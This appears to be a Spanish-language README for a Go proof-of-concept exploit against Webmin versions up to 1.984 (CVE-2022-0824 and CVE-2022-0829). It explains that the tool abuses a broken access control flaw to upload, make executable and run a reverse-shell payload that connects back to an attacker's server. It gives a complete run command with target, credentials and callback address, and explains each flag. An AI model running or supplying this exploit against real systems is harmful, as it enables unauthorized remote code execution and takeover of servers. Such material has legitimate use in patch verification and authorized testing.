
Prueba de concepto de exploit para CVE-2022-0824
RCE en Webmin <= 1.984
CVE-2022-0824 y CVE-2022-0829
Esto explota una vulnerabilidad BAC en Webmin para subir un archivo malicioso, cambiar los permisos del archivo y ejecutarlo. El archivo, creado en la función makePayload, es una reverse shell que se conecta de vuelta a un servidor controlado por el atacante.
go run cve-2022-0824.go -t "https://172.16.177.132:10000" -c "usuario:contraseña" -sl 172.16.177.1:8999 -s 172.16.177.1 -p 4444
t -> url objetivo
c -> credenciales para webmin
sl -> IP y puerto de tu servidor local para alojar tu payload
s -> IP de callback
p -> puerto de callback
https://www.webmin.com/security.html
https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/
https://nvd.nist.gov/vuln/detail/CVE-2022-0824